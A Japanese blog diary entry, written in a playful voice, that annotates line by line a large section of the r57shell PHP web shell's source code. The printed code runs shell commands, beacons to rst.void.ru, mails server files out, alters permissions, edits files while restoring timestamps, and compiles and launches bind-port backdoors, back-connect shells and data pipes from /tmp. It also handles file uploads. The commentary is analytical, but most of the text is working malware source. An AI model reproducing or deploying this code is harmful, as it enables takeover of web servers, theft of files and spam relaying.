にっき
2007/05/03 22:16:10
→つおくてにうげ〜む?
ふに・・・
おやくそく通り出題元が偏っててびみょ〜だったけど・・・
ちゃんぴおんさんなら折り返しぐらい華麗に決めてほしかったにう(つx;【みかん
ってことでもう3回目になっちゃったけど続きを☆
うにっくすならくっき〜を使ってゆ〜ざ名をせっとしたりしなかったり?
html のへっだを出力して・・・
こまんどが指定されててぷらいべ〜となさ〜ばじゃなければこっそり利用履歴解析っぽいのを仕込んで
・・・ってこわいにうΣ(>x<;【みかん
ってことでめいん部分を出力☆
まずは
・phpinfo の表示
・php.ini の表示
・cpu の状態表示(うに系限定)
・めもりの状態表示(うに系限定)
・user 一覧の表示(うに系限定)
・てんぽらりふぁいるの削除
・このすくりぷとの証拠隠滅機能
へのりんくを描いて
せ〜ふも〜どの状態,php のう゛ぁ〜ぢょん,curl 関数が使えるかどうかを描いて
MySQL,MSSQL,PostgreSQL,Oracle が利用可能かを描いて
封印されてる関数の一覧とでぃすく使用量&でぃすく総量を表示☆
OSに合わせてゆ〜ざ名やさ〜ば名などの環境変数を表示☆
$c1 と $c2 のどっちかが空っぽだったら強制終了☆
ってあくせす解析っぽいのを消しちゃうとめなのですか!?Σ(・x・;【みかん
post で cmd が mail なら to, subj, text,from をせっとしてめ〜る発射☆
って入力値をだいれくとに発射してるにうΣ(・x・;【みかん
すぱむの踏み台にも便利そうだにゃぁ・・・ (つx;【みかん
post で cmd が mail_file なら loc_file を使ってめ〜る発射☆
今度は外部ふぁいるのいんくる〜どもありなのですか(つx;【みかん
post で cmd が find_text のときはふぁいるを検索☆
post で cmd が ch_ のときは what, param1, param2 を使って
お〜な〜,ぐる〜ぷ,ぱ〜みっしょんを変更☆
ってそれなら what で分岐しないでも ch_own, ch_grp, ch_mod でいいようにゃ・・・
post で cmd が mk のときは what, action,mk_name を使って
ふぁいるやでぃれくとりを創ったり消したり☆
でもやっぱり mk_file とか rm_dir みたいのでいいようにゃ・・・
post で cmd が edit_file のときは e_name のふぁいるを編集☆
edit は特別扱いなのにう?(´・ω・`;【みかん
ってことで post + cmd = save_file で edit_file したのを保存☆
post で port, bind_pass がせっとされてて use が C のときは
外部から接続できそうなそ〜すを一時ふぁいるに描き出してこんぱいる☆
一時ふぁいるをなかったことにしたらさっそくこんぱいるしたのを裏でこっそり実行☆
さっきとほとんどおんなじだけど use が Perl のときは
外部から接続できそうな perl すくりぷとを裏でこっそり実行☆
post で ip, port がせっとされてて use が Perl のときは
指定したとこに接続ちゃれんぢ☆ヾ(・x・。【みかん
use が C のときはやっぱりこっそりこんぱいるしてから実行☆
続けて local_port,remote_host, remote_port で use が Perl のときは
で〜たぱいぷでちゃれんぢ☆
use が C のときはおやくそく通りこっそりこんぱいるして実行☆
えいりあすがせっとしてあったらこまんどを変更☆
ふぁいるのあっぷろ〜どもできちゃうですか...〆(´ω`;【みかん
まだまだ続きそうにう_(.._;【みかん
おやくそく通り出題元が偏っててびみょ〜だったけど・・・
ちゃんぴおんさんなら折り返しぐらい華麗に決めてほしかったにう(つx;【みかん
ってことでもう3回目になっちゃったけど続きを☆
if($unix)
{
if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname =
$_COOKIE['uname']; }
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
if($safe_mode) { $sysctl = '-'; }
else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
else
{
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
if(empty($sysctl)) { $sysctl = '-'; }
setcookie('sysctl',$sysctl);
}
}うにっくすならくっき〜を使ってゆ〜ざ名をせっとしたりしなかったり?
echo $head;
echo '</head>';html のへっだを出力して・・・
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
if (!in_array($addr[0], $serv)) {
@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0
height=0 width=0>";
@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} こまんどが指定されててぷらいべ〜となさ〜ばじゃなければこっそり利用履歴解析っぽいのを仕込んで
・・・ってこわいにうΣ(>x<;【みかん
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160>
<font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".
$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".
$rb;
if($unix)
{
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".
$rb;
}
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".
$rb."<br>";ってことでめいん部分を出力☆
まずは
・phpinfo の表示
・php.ini の表示
・cpu の状態表示(うに系限定)
・めもりの状態表示(うに系限定)
・user 一覧の表示(うに系限定)
・てんぽらりふぁいるの削除
・このすくりぷとの証拠隠滅機能
へのりんくを描いて
echo ws(2)."safe_mode: <b>";
echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
echo "</b>".ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
echo "</b>".ws(2);せ〜ふも〜どの状態,php のう゛ぁ〜ぢょん,curl 関数が使えるかどうかを描いて
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
echo "</b><br>".ws(2);MySQL,MSSQL,PostgreSQL,Oracle が利用可能かを描いて
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df
</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;封印されてる関数の一覧とでぃすく使用量&でぃすく総量を表示☆
if($unix){
echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.
ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') &&
function_exists('posix_getpwuid'))
{
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].
' )<br>';
}
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";
echo ws(3).$dir;
echo "<br></font>";
}OSに合わせてゆ〜ざ名やさ〜ば名などの環境変数を表示☆
echo "</font>";
echo "</td></tr></table>";
if(empty($c1)||empty($c2)) { die(); }
$f = '<br>';
$f .= base64_decode($c1);
$f .= base64_decode($c2);$c1 と $c2 のどっちかが空っぽだったら強制終了☆
ってあくせす解析っぽいのを消しちゃうとめなのですか!?Σ(・x・;【みかん
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
{
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
err(6+$res);
$_POST['cmd']="";
}post で cmd が mail なら to, subj, text,from をせっとしてめ〜る発射☆
って入力値をだいれくとに発射してるにうΣ(・x・;【みかん
すぱむの踏み台にも便利そうだにゃぁ・・・ (つx;【みかん
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
if(empty($_POST['from'])) { $_POST['from'] = '[email protected]'; }
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
err(6+$res);
$_POST['cmd']="";
}
}post で cmd が mail_file なら loc_file を使ってめ〜る発射☆
今度は外部ふぁいるのいんくる〜どもありなのですか(つx;【みかん
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}post で cmd が find_text のときはふぁいるを検索☆
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
{
switch($_POST['what'])
{
case 'own':
@chown($_POST['param1'],$_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'],$_POST['param2']);
break;
case 'mod':
@chmod($_POST['param1'],intval($_POST['param2'], 8));
break;
}
$_POST['cmd']="";
}post で cmd が ch_ のときは what, param1, param2 を使って
お〜な〜,ぐる〜ぷ,ぱ〜みっしょんを変更☆
ってそれなら what で分岐しないでも ch_own, ch_grp, ch_mod でいいようにゃ・・・
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
{
switch($_POST['what'])
{
case 'file':
if($_POST['action'] == "create")
{
if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']);
$_POST['cmd']=""; }
else {
fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd']="edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center>
<font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
}
}
else if($_POST['action'] == "delete")
{
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr>
<td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td>
</tr></table>";
$_POST['cmd']="";
}
break;
case 'dir':
if($_POST['action'] == "create"){
if(mkdir($_POST['mk_name']))
{
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center>
<font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
}
else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
}
else if($_POST['action'] == "delete"){
if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr>
<td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td>
</tr></table>";
$_POST['cmd']="";
}
break;
}
}post で cmd が mk のときは what, action,mk_name を使って
ふぁいるやでぃれくとりを創ったり消したり☆
でもやっぱり mk_file とか rm_dir みたいのでいいようにゃ・・・
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".
$lang[$language.'_butt10']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}post で cmd が edit_file のときは e_name のふぁいるを編集☆
edit は特別扱いなのにう?(´・ω・`;【みかん
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center>
<font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
}
}ってことで post + cmd = save_file で edit_file したのを保存☆
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";
}post で port, bind_pass がせっとされてて use が C のときは
外部から接続できそうなそ〜すを一時ふぁいるに描き出してこんぱいる☆
一時ふぁいるをなかったことにしたらさっそくこんぱいるしたのを裏でこっそり実行☆
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
}さっきとほとんどおんなじだけど use が Perl のときは
外部から接続できそうな perl すくりぷとを裏でこっそり実行☆
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}post で ip, port がせっとされてて use が Perl のときは
指定したとこに接続ちゃれんぢ☆ヾ(・x・。【みかん
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}use が C のときはやっぱりこっそりこんぱいるしてから実行☆
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']==
"Perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
$_POST['cmd']="ps -aux | grep dp";
}続けて local_port,remote_host, remote_port で use が Perl のときは
で〜たぱいぷでちゃれんぢ☆
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']==
"C"))
{
cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
$_POST['cmd']="ps -aux | grep dpc";
}use が C のときはおやくそく通りこっそりこんぱいるして実行☆
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }えいりあすがせっとしてあったらこまんどを変更☆
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
$_POST['dir']."/".$nfn)
or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".
$HTTP_POST_FILES['userfile']['name']."</div></font>");
}ふぁいるのあっぷろ〜どもできちゃうですか...〆(´ω`;【みかん
まだまだ続きそうにう_(.._;【みかん
こめんと
投稿された内容の著作権はこめんとの投稿者に帰属するっぽいです☆また,現在 IE6 以下で Sleipnir,Lunascape,Donut じゃないゆ〜ざえ〜じぇんとからの描き込みを制限してますです☆
該当しちゃうかたはてきとうにゆ〜ざえ〜じぇんとを偽装しちゃってくださいです(´ω`;【みかん
あじ
ED
えでん
えれふぃ
ぐらぶれ
etc
にっき